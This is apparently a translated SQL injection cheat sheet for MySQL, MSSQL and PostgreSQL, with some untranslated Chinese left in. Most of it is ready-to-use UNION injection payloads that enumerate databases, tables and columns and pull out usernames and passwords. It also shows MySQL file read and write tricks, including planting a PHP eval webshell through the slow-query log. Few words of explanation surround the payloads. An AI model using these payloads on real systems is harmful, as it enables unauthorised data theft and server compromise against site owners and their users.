0x00 Database Introduction
access: There is no user with the highest authority, and there is no system form. It is usually tested by brute force guessing. Access is independent, and one database corresponds to one website. MySQL databases can usually control multiple websites, and access can also use offset injection
mysql mssql postgresql: These three databases have the highest authority user, root sa mdb, etc. Mysql is divided into different 5.0 versions and there are different forms.
0x01 Basic statement of mysql mssql postgresql
mysql reads files: load_file()
union select 1,load_file('d:/1.txt'),3,4,5
mysql writes content to the file: into outfile
union select 1,‘shell’,3,4,5 into outfile ‘d:/1.txt’
To break through the write permission, please refer to the previous article, the breakthrough of secure_file_priv usually requires an executable page to execute the sql statement, usually with the help of the sql command line, phpmyadmin, etc.
set global slow_query_log=1;
set global slow_query_log_file='shell路径';
select '<?php eval($_GET[A])?>' or SLEEP(1);
mssql injection
- measure the number of columns:
order by 4
and 1=2 union all select null,null,null,null
- measure the position:
and 1=2 union all select null,1,null,null
and 1=2 union all select null,null,'s',null
- get information:
@@version
get version information
db_name()
current database name
user、system_user,current_user,user_name
get current user name
@@SERVERNAME
get server host information
and 1=2 union all select null,db_name(),null,null
- get table name:
and 1=2 union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u'),null,null
union all select null,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype='u' and name not in ('manage')),null,null
- get column names:
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),1) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),2) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),3) from sysobjects),null,null
and 1=2 union all select null,(select top 1 col_name(object_id('manage'),4) from sysobjects),null,null
-retrieve data:
and 1=2 union all select null,username, password ,null from manage
postgresql statement
- measure the number of columns:
order by 4
and 1=2 union select null,null,null,null
- Measuring position: 2nd, 3rd
and 1=2 union select 'null',null,null,null 错误
and 1=2 union select null,'null',null,null 正常
and 1=2 union select null,null,'null',null 正常
and 1=2 union select null,null,null,'null' 错误
-getting information:
and 1=2 UNION SELECT null,version(),null,null
and 1=2 UNION SELECT null,current_user,null,null
and 1=2 union select null,current_database(),null,null
- Get the database name:
and 1=2 union select null,string_agg(datname,','),null,null from pg_database
- get table name:
1、and 1=2 union select null,string_agg(tablename,','),null,null from pg_tables where schemaname='public'
2、and 1=2 union select null,string_agg(relname,','),null,null from pg_stat_user_tables
- get column names:
and 1=2 union select null,string_agg(column_name,','),null,null from information_schema.columns where table_name='reg_users'
-retrieve data:
and 1=2 union select null,string_agg(name,','),string_agg(password,','),null from reg_users
- Supplement - Get the dba user (also under the DBA user, it is possible to read and write files):
and 1=2 union select null,string_agg(usename,','),null,null FROM pg_user WHERE usesuper IS TRUE
Msql poadtgresql usually uses null to replace the judgment field, mysql can use numbers